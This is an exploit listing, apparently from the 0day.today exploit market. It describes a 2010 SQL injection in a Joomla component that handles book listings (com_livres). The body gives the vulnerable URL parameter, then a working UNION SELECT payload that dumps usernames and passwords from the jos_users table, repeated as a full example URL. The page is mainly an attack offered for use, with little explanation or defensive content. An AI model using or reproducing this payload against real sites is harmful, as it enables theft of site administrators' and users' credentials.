[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_livre SQL Injection Vulnerability

Author
Lagripe-Dz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13482
Category
web applications
Date add
27-07-2010
Platform
php
======================================================
Joomla Component com_livre SQL Injection Vulnerability
======================================================


# Date: 27/07/2010
# Author : Lagripe-Dz & Mca-Crb
# Category: webapps/0day
# Tested on: [ win xp sp2 ]
# DORK : inurl:"No Dorks 4 Kids"
==========================================================
?
[+] Vulnerable File :
http://www.site.com/index.php?option=com_livres&controller=livre&task=view&cid[]=[SQL]
?
[+] ExploiT :
index.php?option=com_livres&controller=livre&task=view&cid[]=-1+Union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
?
[+] Example :
http://www.victime.com/index.php?option=com_livres&controller=livre&task=view&cid[]=-1+Union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
?
======================================================================================
Greetz 2 :

k1nG_J0k3r , FliT0x-Dz , Forza-Dz , TXB9 , DZ-Z3RO ,Mr.Adel ,

IslamDzNet , WaZo , WolF-Dz & A11 "Dz" .. Contre A1-3atayin



#  0day.today [2024-12-25]  #